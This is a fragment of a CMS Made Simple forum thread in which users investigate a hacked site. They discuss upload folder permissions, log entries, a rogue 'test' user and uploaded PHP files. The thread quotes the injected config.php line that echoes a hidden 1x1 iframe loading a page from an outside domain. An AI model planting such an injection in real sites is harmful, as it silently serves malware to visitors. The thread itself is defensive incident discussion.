CMS Made Simple Forums

The stupid thing is I need the upload folder to be executable as the stylesheet I use is located there (/uploads/images/templates). So I just made the upload folder read-execute, so no-one can drop any-stuff there. The down-side of that is that I need to change permission everytime I upload a pictur...

@larry:

Just install it in some safe place, and run it! it will ask for a pwd, but you can simply remove that from the code.

For anyone interested, these are the files he used, see attachement (I changed the php to txt). It appears the script creates a new user somehow....

Ok, reading the logs it was done by 212.96.213.210

Using user 'test' (WTF?), who also uploaded two files (dst2.php and image.php) in /uploads/images

Better dig a little deeper still.

can you confirm the permissions set on your config file? secondly, i would be talking to my host, if this is a shared hosting environment, someone else on the same server may have accessed this file. it would be a good idea to be looking at your access logs to find out who changed it. -rw-rw-rw-  c...

Hi all, My website, running CMS made simple 1.2.3 has been hacked, the following lines have been injected into config.php just after the <?php in the root of the site: echo '<__iframe src="http://acdedblshd.com/dl/adv530.php" width=1 height=1></__iframe>'; The code points to a site running...